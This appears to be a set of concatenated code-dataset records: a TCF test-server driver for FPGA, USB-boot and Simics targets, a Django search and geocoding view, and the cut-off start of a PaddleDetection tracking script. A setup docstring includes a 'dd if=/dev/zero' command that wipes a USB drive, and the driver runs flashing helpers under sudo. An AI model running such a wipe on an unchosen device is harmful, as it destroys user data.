(\" \".join(cmdline)))\n s = subprocess.check_output(cmdline, cwd = \"/tmp\",\n stderr = subprocess.STDOUT)\n self.log.info(\"flashed with %s: %s\" % (\" \".join(cmdline), s))\n except subprocess.CalledProcessError as e:\n self.log.error(\"flashing with %s failed: (%d) %s\" %\n (\" \".join(cmdline), e.returncode, e.output))\n raise\n self.log.info(\"flashing succeeded\")\n self.pc_board.power_off_do(self)\n\n def image_do_set(self, t, n):\n pass\n\nclass tt_max10(\n ttbl.test_target,\n ttbl.tt_power_control_mixin,\n ttbl.cm_serial.cm_serial,\n ttbl.test_target_images_mixin):\n \"\"\"\n Test target for an Altera MAX10\n\n This allows to flash images to an Altera MAX10, using the Quartus\n tools, freely downloadable from http://dl.altera.com.\n\n Exports the following interfaces:\n\n - power control (using any AC power switch, such as the\n :class:`Digital Web Power Switch 7 <ttbl.pc.dlwps7>`)\n - serial console\n - image (in hex format) flashing (using the Quartus Prime 
tools\n package)\n\n Multiple instances at the same time are supported; however, due to\n the JTAG interface not exporting a serial number, addressing has\n to be done by USB path, which is risky (as it will change when the\n cable is plugged to another port or might be enumerated in a\n different number).\n\n Note that:\n\n - when flashing LED1 blinks green/blue\n\n - the blue power switch must be pressed, to ensure the board is\n *ON* when we switch the AC power to the power brick on\n\n - SW2 DIP bank on the back of the board has to be all OFF (down)\n except for 3, that has to be ON (this comes from the Zephyr\n Altera MAX10 configuration)\n\n - J7 (at the front of the board, next to the coaxial connectors)\n has to be open\n\n Pending:\n\n - CPU design hardcoded to use Zephyr's -- it shall be possible to\n flash it\n \"\"\"\n\n #: Path where the Quartus Programmer binaries have been installed\n #:\n #: 1. Download Quartus Prime Programmer and Tools from\n #: http://dl.altera.com/17.1/?edition=lite&platform=linux&download_manager=direct\n #: 2. Install to e.g `/opt/intelFPGA/17.1/qprogrammer/bin`.\n #: 3. Configure in /etc/ttbd-production/conf_00_max10.py::\n #:\n #: .. code-block: python\n #:\n #: import ttbl.tt\n #: ttbl.tt.tt_max10.quartus_path = \"/opt/intelFPGA/17.1/qprogrammer/bin\"\n quartus_path = \"__unconfigured__tt_max10.quartus_path__\"\n\n #: Path to where the NIOS Zephyr CPU image has been installed\n #:\n #: 1. Download the CPU image to `/var/lib/ttbd`::\n #:\n #: $ wget -O /var/lib/ttbd/ghrd_10m50da.sof \\\n #: https://github.com/zephyrproject-rtos/zephyr/raw/master/arch/nios2/soc/nios2f-zephyr/cpu/ghrd_10m50da.sof\n #:\n #: 3. Configure in /etc/ttbd-production/conf_00_max10.py:\n #:\n #: .. code-block: python\n #:\n #: import ttbl.tt\n #: ttbl.tt.tt_max10.input_sof = \"/var/lib/ttbd/ghrd_10m50da.sof\"\n input_sof = \"__unconfigured__tt_max10.input_sof__\"\n\n def __init__(self, _id, device_id,\n power_control, serial_port = None):\n assert isinstance(_id, basestring)\n assert isinstance(device_id, basestring)\n assert isinstance(power_control, ttbl.tt_power_control_impl) \\\n or isinstance(power_control, list)\n\n self.device_id = device_id\n\n ttbl.test_target.__init__(self, _id)\n ttbl.tt_power_control_mixin.__init__(self, power_control)\n ttbl.test_target_images_mixin.__init__(self)\n self.serial_port = serial_port\n if serial_port:\n ttbl.cm_serial.cm_serial.__init__(\n self, self.state_dir,\n [\n \"pc\",\n { 'port': serial_port, 'baudrate': 115200 }\n ])\n else:\n ttbl.cm_serial.cm_serial.__init__(self, self.state_dir, [])\n\n quartus_cpf_template = \"\"\"\\\n<?xml version=\"1.0\" encoding=\"US-ASCII\" 
standalone=\"yes\"?>\n<cof>\n\t<output_filename>${OUTPUT_FILENAME}</output_filename>\n\t<n_pages>1</n_pages>\n\t<width>1</width>\n\t<mode>14</mode>\n\t<sof_data>\n\t\t<user_name>Page_0</user_name>\n\t\t<page_flags>1</page_flags>\n\t\t<bit0>\n\t\t\t<sof_filename>${SOF_FILENAME}<compress_bitstream>1</compress_bitstream></sof_filename>\n\t\t</bit0>\n\t</sof_data>\n\t<version>10</version>\n\t<create_cvp_file>0</create_cvp_file>\n\t<create_hps_iocsr>0</create_hps_iocsr>\n\t<auto_create_rpd>0</auto_create_rpd>\n\t<rpd_little_endian>1</rpd_little_endian>\n\t<options>\n\t\t<map_file>1</map_file>\n\t</options>\n\t<MAX10_device_options>\n\t\t<por>0</por>\n\t\t<io_pullup>1</io_pullup>\n\t\t<config_from_cfm0_only>0</config_from_cfm0_only>\n\t\t<isp_source>0</isp_source>\n\t\t<verify_protect>0</verify_protect>\n\t\t<epof>0</epof>\n\t\t<ufm_source>2</ufm_source>\n\t\t<ufm_filepath>${KERNEL_FILENAME}</ufm_filepath>\n\t</MAX10_device_options>\n\t<advanced_options>\n\t\t<ignore_epcs_id_check>2</ignore_epcs_id_check>\n\t\t<ignore_condone_check>2</ignore_condone_check>\n\t\t<plc_adjustment>0</plc_adjustment>\n\t\t<post_chain_bitstream_pad_bytes>-1</post_chain_bitstream_pad_bytes>\n\t\t<post_device_bitstream_pad_bytes>-1</post_device_bitstream_pad_bytes>\n\t\t<bitslice_pre_padding>1</bitslice_pre_padding>\n\t</advanced_options>\n</cof>\n\"\"\"\n\n # XXX Do we care about FileRevision, DefaultMfr, PartName? Do they need\n # to be parameters? So far seems to work across 2 different boards, leave\n # this alone for now.\n quartus_pgm_template = \"\"\"\\\n/* Quartus Prime Version 16.0.0 Build 211 04/27/2016 SJ Lite Edition */\nJedecChain;\n\tFileRevision(JESD32A);\n\tDefaultMfr(6E);\n\n\tP ActionCode(Cfg)\n\t\tDevice PartName(10M50DAF484ES) Path(\"${POF_DIR}/\") File(\"${POF_FILE}\") MfrSpec(OpMask(1));\n\nChainEnd;\n\nAlteraBegin;\n\tChainType(JTAG);\nAlteraEnd;\"\"\"\n\n def _create_pof(self, output_pof, input_sof, kernel_hex):\n t = string.Template(self.quartus_cpf_template)\n input_sof = os.path.abspath(input_sof)\n kernel_hex = os.path.abspath(kernel_hex)\n # These tools are very stupid and freak out if the desired filename\n # extensions are used. The kernel image must have extension .hex\n with tempfile.NamedTemporaryFile(dir = self.state_dir,\n suffix = \".cof\") as temp_xml:\n xml = t.substitute(SOF_FILENAME = input_sof,\n OUTPUT_FILENAME = output_pof.name,\n KERNEL_FILENAME = kernel_hex)\n temp_xml.write(xml)\n temp_xml.flush()\n try:\n cmd = [\n os.path.join(self.quartus_path, \"quartus_cpf\"),\n \"-c\", temp_xml.name\n ]\n subprocess.check_output(cmd)\n except OSError as e:\n raise RuntimeError(\"Failed to create POF file w/ %s: %s\"\n % (\" \".join(cmd), e))\n except subprocess.CalledProcessError as cpe:\n raise RuntimeError(\"Failed to create POF file: %s\"\n % cpe.output.decode(\"UTF-8\"))\n return output_pof\n\n\n def images_do_set(self, images):\n # We implement image_do_set(), as there is only one image to set\n pass\n\n # FIXME: limitation: SOF image is fixed, should be possible to\n # upload it and default to built-in? 
Problem is we need to fixup\n # the build instructions so they understand they need to upload\n # the SOF too\n # FIXME: also, the SOF is kinda big, 3M\n def image_do_set(self, image_type, image_name):\n if image_type == \"kernel\":\n image_type = \"kernel-max10\"\n if not image_type.startswith(\"kernel-\"):\n raise RuntimeError(\n \"Unknown image type '%s' (valid: kernel-{%s})\"\n % (image_type, \",\".join(self.tags['bsps'].keys())))\n self._power_cycle_do()\n # This code snippet lifted from Zephyr's\n # scripts/support/quartus-flash.py -- thx\n # Minimum changes to place files in directories and wipe them\n # upon context exit, match local style .\n # def _flash_kernel(device_id, input_sof, kernel_hex):\n self.log.info(\"Flashing %s:%s\" % (image_type, image_name))\n with tempfile.NamedTemporaryFile(dir = self.state_dir,\n suffix = \".pof\") as output_pof, \\\n tempfile.NamedTemporaryFile(dir = self.state_dir,\n suffix = \".hex\") as kernel_hex, \\\n tempfile.NamedTemporaryFile(dir = self.state_dir,\n suffix = \".cdf\") as temp_cdf:\n # Apparently, the tools get freaked out by our largish\n # file names, so just make it a temp with a short sweet name\n shutil.copyfile(image_name, kernel_hex.name)\n pof_file = self._create_pof(output_pof, self.input_sof, kernel_hex.name)\n dname, fname = os.path.split(pof_file.name)\n t = string.Template(self.quartus_pgm_template)\n cdf = t.substitute(POF_DIR = dname, POF_FILE = fname)\n temp_cdf.write(cdf)\n temp_cdf.flush()\n try:\n output = subprocess.check_output([\n os.path.join(self.quartus_path, \"quartus_pgm\"),\n \"--quiet\",\n \"-c\", self.device_id,\n temp_cdf.name\n ])\n except subprocess.CalledProcessError as cpe:\n raise RuntimeError(\"Failed to flash image: %s\"\n % cpe.output.decode(\"UTF-8\"))\n self.log.info(\"Flashed %s:%s; output:\\n%s\"\n % (image_type, image_name, output))\n self._power_off_do()\n self.log.info(\"flashing succeeded\")\n\n\nclass grub2elf(tt_serial, ttbl.test_target_images_mixin):\n \"\"\"Boot anything that can take an ELF image with grub2\n\n **Overview**\n\n A platform that can EFI boot off a multiplexed boot USB drive;\n this drive:\n\n - when connected to the target, acts as boot drive which boots\n into grub2 which multiboots into whatever ELF binary we gave it\n\n - when connected to the server, we partition, format, install\n grub2 and the ELF kernel to be booted.\n\n An eight-port USBRLY8 relay bank acting as a USB switcher, each\n relay switching one of the four USB lines from target to server,\n using :class:`ttbl.usbrly08b.plugger`:\n\n - the USB-A female cable is connected to the C relay terminals\n\n - the USB-A male cable for the server is connected to the NC relay\n terminals\n\n - the USB-A male cable for the client is connected to the NO relay\n terminal\n\n - a target that EFI/boots and can boot off a USB drive\n\n Limitations:\n\n - kinda hardcoded x86-64, shall be easy to fix\n\n **Methodology**\n\n The power rail for the target ensures that when the target is\n powered on, the USB boot drive is connected to the target by the\n USB multiplexor. 
When the target is off, the USB boot drive is\n connected to the server.\n\n The imaging process in :meth:`image_do_set` will make sure the USB\n drive is connected to the server (by powering off the target) and\n then use the helper script ``/usr/share/tcf/setup-efi-grub2-elf.sh``\n to flash the ELF kernel to the drive (as well, will create the\n grub2 boot structure)--for this we need the drive's USB serial\n number and the ELF file to boot.\n\n Upon boot, the boot drive will be detected and booted by default,\n as the grub configuration is set to just boot that ELF kernel.\n\n For cases where BIOS interaction with the console might be\n necessary, a boot coercer can be implemented in the form of a\n power control implementation that in its `power_on_do()` method\n talks to the serial port to do whatever is needed. See for example\n :class:`conf_00_lib.minnowboard_EFI_boot_grub_pc` which does so\n for Minnowboards.\n\n **Setup**\n\n - the helper script ``/usr/share/tcf/setup-efi-grub2-elf.sh`` is\n used to partition, configure and setup the USB drive--it\n is run with *sudo* (via the sudo configurations script\n :download:`/etc/sudoers.d/ttbd_sudo <../ttbd/ttbd_sudo>`)\n\n - The daemon will require specific capabilities for being able to\n run *sudo* (*CAP_SETGID*, *CAP_SETUID*, *CAP_SYS_ADMIN*,\n *CAP_FOWNER*, *CAP_DAC_OVERRIDE*) setup in\n :download:`/etc/systemd/system/ttbd@.service\n <../ttbd/ttbd@.service>`.\n\n - Ensure the following packages are available in the system:\n\n * parted\n * dosfstools\n * grub2-efi-x64-cdboot and grub2-efi-x64-modules\n * util-linux\n\n - Identify the serial number for the USB drive; plug it to a\n machine and issue::\n\n $ lsblk -o \"NAME,SERIAL,VENDOR,MODEL\"\n NAME SERIAL VENDOR MODEL\n sdb AOJROZB8 JetFlash Transcend 8GB\n sdj 76508A8E JetFlash Transcend 8GB\n ...\n\n (for this example, ours is *76508A8E*, `/dev/sdj`)\n\n blank the USB drive (**NOTE!!!** This will destroy the drive's\n contents)::\n\n $ dd if=/dev/zero of=/dev/sdj\n\n - Create a power controller\n\n - Setup the target's BIOS to boot by default off the USB drive\n\n See :func:`conf_00_lib.minnowboard_add` for an example instantiation.\n\n \"\"\"\n def __init__(self, _id,\n power_controller,\n usb_drive_serial,\n usbrly08b_serial, usbrly08b_bank,\n serial_port,\n boot_coercer = None):\n power_control = [\n # Ensure the USB dongle is / has been connected to the server\n ttbl.pc.delay_til_usb_device(usb_drive_serial,\n when_powering_on = False,\n want_connected = True),\n ttbl.usbrly08b.plugger(usbrly08b_serial, usbrly08b_bank),\n # let the dongle power up, otherwise it won't be seen\n ttbl.pc.delay(2),\n ttbl.pc.delay_til_usb_device(usb_drive_serial,\n when_powering_on = True,\n want_connected = False),\n ttbl.pc.delay(2),\t\t# let USB dongle settle to the target\n ttbl.cm_serial.pc(),\t\t# Let it open and close ports\n power_controller,\n ttbl.pc.delay(2),\t\t# board powers up...\n ]\n # A boot coercer is a PCI that talks to the target to get it to\n # boot right, so it only implements power_on_do() to do that,\n # power_off_do() has only a pass and power_get_do() returns\n # True.\n # This is eg needed if we need to tell the bios to do this, do\n # that -- in the case of Minnowboard, tell the EFI shell to\n # run grub (sometimes).\n if boot_coercer:\n assert isinstance(boot_coercer, ttbl.tt_power_control_impl)\n power_control.append(boot_coercer)\n self.usb_drive_serial = usb_drive_serial\n tt_serial.__init__(\n self,\n _id,\n power_control,\n serial_ports = [\n \"pc\",\n { 
\"port\": serial_port, \"baudrate\": 115200 }\n ])\n ttbl.test_target_images_mixin.__init__(self)\n\n image_types_valid = (\"kernel\", \"kernel-x86\")\n\n def image_do_set(self, image_type, image_name):\n if image_type not in self.image_types_valid:\n raise self.unsupported_image_e(\n \"%s: image type not supported (valid: %s)\"\n % (image_type, \", \".join(self.image_types_valid)))\n # power off the board to flash, this will redirect the USB\n # drive to be connected to the server\n self.power_off(self.owner_get())\n\n # We don't verify image_name is an ELF file so that we can\n # also use this to flash other stuff and it's up to the Grub\n # bootloader to interpret it.\n\n # We need an image with a bootloader, we use grub2 and we\n # share the setup-efi-grub2-elf.sh implementation from\n # simics and others\n cmd_path = commonl.ttbd_locate_helper(\"setup-efi-grub2-elf.sh\",\n log = self.log)\n # Yeah, sudo ... it kinda sucks, but it is the best way to\n # isolate it -- could run from the daemon, then it'd have too\n # many permissions--nope. file ./ttbd.sudo contains the config\n # to put in /etc/sudoers.d for this to work.\n cmdline = [ \"sudo\", \"-n\", cmd_path, self.usb_drive_serial,\n image_name, \"x86_64\" ]\n try:\n self.log.debug(\"flashing with command '%s'\" % \" \".join(cmdline))\n output = subprocess.check_output(cmdline,\n stderr = subprocess.STDOUT)\n except subprocess.CalledProcessError as cpe:\n msg = \"flashing with command '%s' failed: %s\" \\\n % (\" \".join(cpe.cmd), cpe.output)\n self.log.error(msg)\n raise RuntimeError(msg)\n self.log.debug(\"flashed with command '%s': %s\"\n % (\" \".join(cmdline), output))\n\n def images_do_set(self, images):\n # No need to set multiple images at the same time\n pass\n\nclass simics(\n ttbl.test_target,\n ttbl.tt_power_control_mixin,\n ttbl.tt_power_control_impl,\n ttbl.test_target_images_mixin,\n ttbl.test_target_console_mixin):\n \"\"\"\n Driver for a target based on Simics simulation of a platform\n\n Currently this driver is quite basic and supports only the image\n and console management interfaces:\n\n - images are only supported as an ELF file that is booted by\n *grub2* when simics boots from a hard disk image generated on\n the fly.\n\n - the only supported console is a serial output (no input)\n\n **System setup**\n\n 1. In a configuration file (e.g. 
*/etc/environment*), set the base\n package for Simics::\n\n SIMICS_BASE_PACKAGE=/opt/simics/5.0/simics-5.0.136\n\n note that all the packages and extensions installed in there\n must have been registered with the global Simics configuration,\n as it will execute under the user as which the daemon is run\n (usually *ttbd*).\n\n Note that the installation of Simics and any extra packages\n needed can be done automagically with::\n\n $ destdir=/opt/simics/5.0\n $ mkdir -p $destdir\n # --batch: no questions asked, just proceed\n # -a: auto select packages and register them\n $ ./install-simics.pl --batch -a --prefix $destdir \\\\\n package-1000-5.0.136-linux64.tar.gz.aes KEY-1000 \\\\\n package-1001-5.0.54-linux64.tar.gz.aes KEY-1001 \\\\\n package-1010-5.0.59-linux64.tar.gz.aes KEY-1010 \\\\\n package-1012-5.0.24-linux64.tar.gz.aes KEY-1012 \\\\\n package-2018-5.0.31-linux64.tar.gz.aes KEY-2018 \\\\\n package-2075-5.0.50-linux64.tar.gz.aes KEY-2075\n\n \"\"\"\n class error_e(Exception):\t\t# pylint: disable = missing-docstring\n pass\n\n class simics_start_e(error_e):\t# pylint: disable = missing-docstring\n pass\n\n #: location of the base Simics installation in the file system; by\n #: default this taken from the *SIMICS_BASE_PACKAGE* environment\n #: variable, if it exists; it can also be set in a configuration\n #: file as:\n #:\n #: >>> ttbl.tt.simics.base_package = \"/some/path/simics-5.0.136\"\n base_package = os.environ.get('SIMICS_BASE_PACKAGE', None)\n\n def __init__(self, _id, simics_cmds, _tags = None,\n image_size_mb = 100):\n assert isinstance(_id, basestring)\n assert isinstance(simics_cmds, basestring)\n assert image_size_mb > 0\n if self.base_package == None:\n raise RuntimeError(\n \"Simics not yet configured, either define environment \"\n \"variable SIMICS_BASE_PACKAGE or configuration \"\n \"ttbl.tt.simics.base_package\")\n ttbl.test_target.__init__(self, _id, _tags = _tags)\n ttbl.tt_power_control_mixin.__init__(self)\n ttbl.tt_power_control_impl.__init__(self)\n ttbl.test_target_images_mixin.__init__(self)\n ttbl.test_target_console_mixin.__init__(self)\n self.simics_path = os.path.join(self.base_package, \"bin/simics\")\n self.simics_check_path = os.path.join(self.base_package,\n \"linux64/bin/simics-common\")\n self.simics_cmds = simics_cmds\n #: Variables that can be expanded in the Simics configuration\n #: script passed as an argument\n self.simics_vars = dict(\n simics_workspace = os.path.join(self.state_dir,\n \"simics.workspace\"),\n simics_pidfile = os.path.join(self.state_dir, \"simics.pid\"),\n simics_console = os.path.join(self.state_dir,\n \"simics-console.read\"),\n simics_hd0 = os.path.join(self.state_dir, \"simics-hd0.img\"),\n simics_hd0_size = image_size_mb,\n )\n self.logfile_name = os.path.join(self.state_dir, \"simics.log\")\n self.telnet = None\n # FIXME: verify the BSP is kosher? 
generate command line from it?\n\n image_types_valid = ( \"kernel\", \"kernel-x86\" )\n\n # Image management interface\n def image_do_set(self, image_type, image_name):\n if image_type not in self.image_types_valid:\n raise self.unsupported_image_e(\n \"%s: image type not supported (valid: %s)\"\n % (image_type, \", \".join(self.image_types_valid)))\n # power off the target to flash, so in case simics is running\n # on the image/files, it is stopped and we won't conflict /\n # corrupt anything.\n self.power_off(self.owner_get())\n # Remove old image and create a new one, just writing one byte\n # at the end to create a shallow file.\n commonl.rm_f(self.simics_vars['simics_hd0'])\n with open(self.simics_vars['simics_hd0'], \"w\") as f:\n f.seek(self.simics_vars['simics_hd0_size'] * 1024 * 1024 - 1)\n f.write('0')\n\n # We don't verify image_name is an ELF file so that we can\n # also use this to flash other stuff and it's up to the Grub\n # bootloader to interpret it.\n\n # Simics needs an image with a bootloader, we use grub2 and we\n # share the setup-efi-grub2-elf.sh implementation from\n # grub2elf.\n cmd_path = commonl.ttbd_locate_helper(\"setup-efi-grub2-elf.sh\",\n log = self.log)\n # Yeah, sudo ... it kinda sucks, but it is the best way to\n # isolate it -- could run from the daemon, then it'd have too\n # many permissions--nope. file ./ttbd_sudo contains the config\n # to put in /etc/sudoers.d for this to work. Also note the\n # systemd configuration requires us to have permission to\n # regain certain capabilities.\n cmdline = [ \"sudo\", \"-n\", cmd_path, self.simics_vars['simics_hd0'],\n image_name, \"i386\" ]\n try:\n self.log.debug(\"flashing with '%s'\" % \" \".join(cmdline))\n output = subprocess.check_output(cmdline,\n stderr = subprocess.STDOUT)\n except subprocess.CalledProcessError as cpe:\n msg = \"flashing with command '%s' failed: %s\" \\\n % (\" \".join(cpe.cmd), cpe.output)\n self.log.error(msg)\n raise RuntimeError(msg)\n self.log.debug(\"flashed with command '%s': %s\"\n % (\" \".join(cmdline), output))\n\n\n def images_do_set(self, images):\n pass\n\n # power control interface\n def _simics_launch(self, _target):\n # Note this function will be called again if there is a\n # resource conflict because simics will fail to start and\n # _power_on_do() will detect it.\n cmd_file_name = os.path.join(self.state_dir, \"commands\")\n # clean up old state, but NOT the hd, as we probably created\n # the image with images_do_set() before\n commonl.rm_f(cmd_file_name)\n if self.fsdb.get(\"debug\") != None:\t# if debugging, keep log\n commonl.rm_f(self.logfile_name)\n commonl.rm_f(self.simics_vars['simics_console'])\n commonl.rm_f(self.simics_vars['simics_pidfile'])\n try:\n # Create a fresh Simics workspace\n shutil.rmtree(self.simics_vars['simics_workspace'],\n ignore_errors = True)\n cmdline = [\n os.path.join(self.base_package, \"bin/project-setup\"),\n \"--ignore-existing-files\",\n self.simics_vars['simics_workspace'] ]\n self.log.info(\"creating workspace with %s\" % \" \".join(cmdline))\n subprocess.check_output(cmdline, shell = False,\n stderr = subprocess.STDOUT)\n except subprocess.CalledProcessError as e:\n self.log.error(\"failed to create workspace: %s\" % e.output)\n except OSError as e:\n self.log.error(\"failed to create workspace: %s\" % e)\n\n # Write the command script here, in case anything changes in\n # the interpretation of the fields\n simics_console_port = commonl.tcp_port_assigner(1)\n with open(cmd_file_name, \"w\") as cmd_file:\n simics_vars = 
dict(self.simics_vars)\n simics_vars['simics_console_port'] = simics_console_port\n cmd_file.write(self.simics_cmds % simics_vars)\n cmdline = [ self.simics_path, \"-no-gui\" ]\n if self.fsdb.get(\"debug\"):\t\t# if debugging, be verbose\n cmdline += [ \"-verbose\", \"-verbose\" ]\n cmdline += [\n \"-project\", self.simics_vars['simics_workspace'], cmd_file_name\n ]\n\n # Fire up simics, redirecting all the output (stdout, stderr,\n # traces) to a log file\n logfile = open(self.logfile_name, \"ab\")\n try:\n env = dict(os.environ)\n env['SIMICS_BASE_PACKAGE'] = self.base_package\n self.log.info(\"Starting simics with: %s\" % \" \".join(cmdline))\n p = subprocess.Popen(\n cmdline, shell = False, cwd = self.state_dir, env = env,\n close_fds = True, stdout = logfile, stderr = subprocess.STDOUT)\n except OSError as e:\n raise self.simics_start_e(\"Simics failed to start: %s\" % e)\n with open(self.simics_vars['simics_pidfile'], \"w\") as pidfilef:\n pidfilef.write(\"%d\" % p.pid)\n pid = commonl.process_started(\t\t# Verify it started\n self.simics_vars['simics_pidfile'],\n self.simics_check_path,\n verification_f = os.path.exists,\n verification_f_args = (self.simics_vars['simics_console'],),\n timeout = 20, tag = \"simics\", log = self.log)\n if pid == None:\n raise self.simics_start_e(\"Simics failed to start after 20s\")\n self.fsdb.set('simics_console_port', \"%d\" %\n simics_console_port)\n\n def power_on_do(self, target):\n # try to start simics, retrying if we have to\n for cnt in range(5):\n try:\n self._simics_launch(target)\n break\n except self.error_e:\n with open(self.logfile_name) as logfile:\n for line in logfile:\n if 'Address already in use' in line:\n # Oops, port we took for the console is\n # taken, try again with another port\n self.log.info(\"%d/5: port conflict, trying again\"\n % cnt)\n self.power_off_do(target)\n continue\n else:\n raise RuntimeError(\"simics: did not start after 5 tries\")\n\n def power_off_do(self, _target):\n self.fsdb.set('simics_console_port', None)\n commonl.process_terminate(self.simics_vars['simics_pidfile'],\n tag = \"simics\",\n path = self.simics_check_path)\n\n def power_get_do(self, _target):\n pid = commonl.process_alive(self.simics_vars['simics_pidfile'],\n self.simics_check_path)\n return pid != None\n\n # Console mixin\n # Any file SOMETHING-console.read describes a console that is available.\n def console_do_list(self):\n consoles = []\n for filename in os.listdir(self.state_dir):\n if filename.endswith(\"-console.read\"):\n console_name = filename[:-len(\"-console.read\")]\n consoles.append(console_name)\n return consoles\n\n def console_do_read(self, console_id = None, offset = 0):\n if console_id == None:\n console_id = 'simics'\n if console_id != 'simics':\n raise RuntimeError(\"console ID '%s' not found\" % console_id)\n # Reading is simple -- simics pipes all the output to a file\n # called simics-console.read\n consolefname = os.path.join(self.state_dir,\n \"%s-console.read\" % console_id)\n if os.path.isfile(consolefname):\n # don't open codecs.open() UTF-8, as that will trip Flask\n # when passing the generator up to serve to the client\n ifd = open(consolefname, \"rb\")\n if offset > 0:\n ifd.seek(offset)\n return ifd\n else:\n return iter(())\n\n def console_do_write(self, _data, _console_id = None):\n _simics_console_port = self.fsdb.get('simics_console_port')\n if _simics_console_port == None:\n raise RuntimeError(\"target is off, cannot write to it\")\n simics_console_port = int(_simics_console_port)\n\n # re-create it for 
every write -- yeah, overkill, but this\n # runs across multiple servers, so we don't know if it was\n # power cycled and thus the port is still valid/open..\n # FIXME: hack, should cache\n telnet = telnetlib.Telnet('127.0.0.1', simics_console_port)\n\n # KLUDGE, workaround\n # So this C-like loop (because I want it to be clearer\n # than hidden iterator pythonic stuff) it is chunking\n # the data to be sent to the VM's serial console\n # and doing a short sleep in between. Why?\n # Because by observation we've seen data being lost\n # when sending it to the sock that represents the\n # input. Chunking it up and giving it a breather\n # alleviated it.\n chunk_size = 8\n count = 0\n l = len(_data)\n while l > 0:\n if l >= chunk_size:\n chunk_data = _data[count:count + chunk_size]\n else:\n chunk_data = _data[count:count + l]\n # FIXME: I seriously don't have any idea of what am I doing\n # here; this Python2 string decoding/encoding stuff is\n # utterly confusing -- but this is how it works :/\n telnet.write(chunk_data.decode('latin1').encode('utf-8'))\n time.sleep(0.15)\n l -= chunk_size\n count += chunk_size\n"} {"ext": "py", "sha": "1a31104b11cdd902cc971f225584b84aa89cde71", "content": "#!/usr/bin/python\n# -*- coding: utf-8 -*-\ndef warn(*args, **kwargs):\n pass\n\nfrom django.shortcuts import render\nfrom django.core.files.storage import FileSystemStorage\nfrom django.http import HttpResponse, JsonResponse\nfrom django.db.models import Q\nfrom .models import *\n\ndef search(request):\n try:\n query = request.GET['search']\n query = str(query).lower()\n mydict = {\n \"urls\" : Url.objects.all().filter(Q(link__contains=query) | Q(result__contains=query) | Q(created_at__contains=query) |\n Q(rank__contains=query) | Q(dom__contains=query) | Q(country__contains=query) | Q(state__contains=query) | Q(emails__contains=query) |\n Q(add__contains=query) | Q(org__contains=query) | Q(city__contains=query)\n ).order_by('-created_at')\n }\n return render(request,'list.html',context=mydict)\n except:\n return render(request,'404.html')\n\n\n\n\ndef error_404_view(request, exception):\n return render(request,'404.html')\n\ndef index(request):\n try:\n return render(request, '404.html')\n except:\n return render(request, '404.html')\n\n\n\n\nfrom requests import get\nimport json\nfrom dateutil import parser as dateparser\nfrom django.http import HttpResponse\nfrom django.shortcuts import render\n\ndef result(request):\n #text=request.GET['nm'].strip()\n #http://127.0.0.1:8000/result?uniqueid=12&nm=hi&phonenumber=12321&time=21%2F12%2F1998+12%3A12%3A12\n #result=\"booked\"\n lat=request.GET['LAT']\n lon=request.GET['LON']\n \n import reverse_geocoder as rg\n\n coordinates = (lat,lon)\n #print (rg.search(coordinates)[0]['name'], rg.search(coordinates)[0]['admin1'])\n mydict = {\n \"query\" : f\"{lat},{lon}\",\n \"city\" : rg.search(coordinates)[0]['name'],\n \"state\" : rg.search(coordinates)[0]['admin1']\n }\n response = JsonResponse(mydict)\n return response \n \n\n\n\n\n\n\n\n"} {"ext": "py", "sha": "1a3110a46fac47e9441195ccd606cb148fac6b9a", "content": "# Copyright (c) 2021 PaddlePaddle Authors. 
All Rights Reserved.\n#\n# Licensed under the Apache License, Version 2.0 (the \"License\");\n# you may not use this file except in compliance with the License.\n# You may obtain a copy of the License at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS,\n# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\n# See the License for the specific language governing permissions and\n# limitations under the License.\n\nimport os\nimport time\nimport yaml\nimport cv2\nimport re\nimport numpy as np\nfrom collections import defaultdict\n\nimport paddle\nfrom paddle.inference import Config\nfrom paddle.inference import create_predictor\n\nfrom picodet_postprocess import PicoDetPostProcess\nfrom utils import argsparser, Timer, get_current_memory_mb, _is_valid_video, video2frames\nfrom det_infer import Detector, DetectorPicoDet, get_test_images, print_arguments, PredictConfig\nfrom det_infer import load_predictor\nfrom benchmark_utils import PaddleInferBenchmark\nfrom visualize import plot_tracking\n\nfrom mot.tracker import DeepSORTTracker\nfrom mot.utils import MOTTimer, write_mot_results, flow_statistic, scale_coords, clip_box, preprocess_reid\n\nfrom mot.mtmct.utils import parse_bias\nfrom mot.mtmct.postprocess import trajectory_fusion, sub_cluster, gen_res, print_mtmct_result\nfrom mot.mtmct.postprocess import get_mtmct_matching_results, save_mtmct_crops, save_mtmct_vis_results\n\n# Global dictionary\nMOT_SUPPORT_MODELS = {'DeepSORT'}\n\n\ndef bench_log(detector, img_list, model_info, batch_size=1, name=None):\n mems = {\n 'cpu_rss_mb': detector.cpu_mem / len(img_list),\n 'gpu_rss_mb': detector.gpu_mem / len(img_list),\n 'gpu_util': detector.gpu_util * 100 / len(img_list)\n }\n perf_info = detector.det_times.report(average=True)\n data_info = {\n 'batch_size': batch_size,\n 'shape': \"dynamic_shape\",\n 'data_num': perf_info['img_num']\n }\n log = PaddleInferBenchmark(detector.config, model_info, data_info,\n perf_info, mems)\n log(name)\n\n\nclass SDE_Detector(Detector):\n \"\"\"\n Detector of SDE methods\n\n Args:\n pred_config (object): config of model, defined by `Config(model_dir)`\n model_dir (str): root path of model.pdiparams, model.pdmodel and infer_cfg.yml\n device (str): Choose the device you want to run, it can be: CPU/GPU/XPU, default is CPU\n run_mode (str): mode of running(fluid/trt_fp32/trt_fp16)\n batch_size (int): size of per batch in inference, default is 1 in tracking models\n trt_min_shape (int): min shape for dynamic shape in trt\n trt_max_shape (int): max shape for dynamic shape in trt\n trt_opt_shape (int): opt shape for dynamic shape in trt\n trt_calib_mode (bool): If the model is produced by TRT offline quantitative\n calibration, trt_calib_mode need to set True\n cpu_threads (int): cpu threads\n enable_mkldnn (bool): whether to open MKLDNN\n \"\"\"\n\n def __init__(self,\n pred_config,\n model_dir,\n device='CPU',\n run_mode='fluid',\n batch_size=1,\n trt_min_shape=1,\n trt_max_shape=1088,\n trt_opt_shape=608,\n trt_calib_mode=False,\n cpu_threads=1,\n enable_mkldnn=False):\n super(SDE_Detector, self).__init__(\n pred_config=pred_config,\n model_dir=model_dir,\n device=device,\n run_mode=run_mode,\n batch_size=batch_size,\n trt_min_shape=trt_min_shape,\n trt_max_shape=trt_max_shape,\n trt_opt_shape=trt_opt_shape,\n trt_calib_mode=trt_calib_mode,\n cpu_threads=cpu_threads,\n 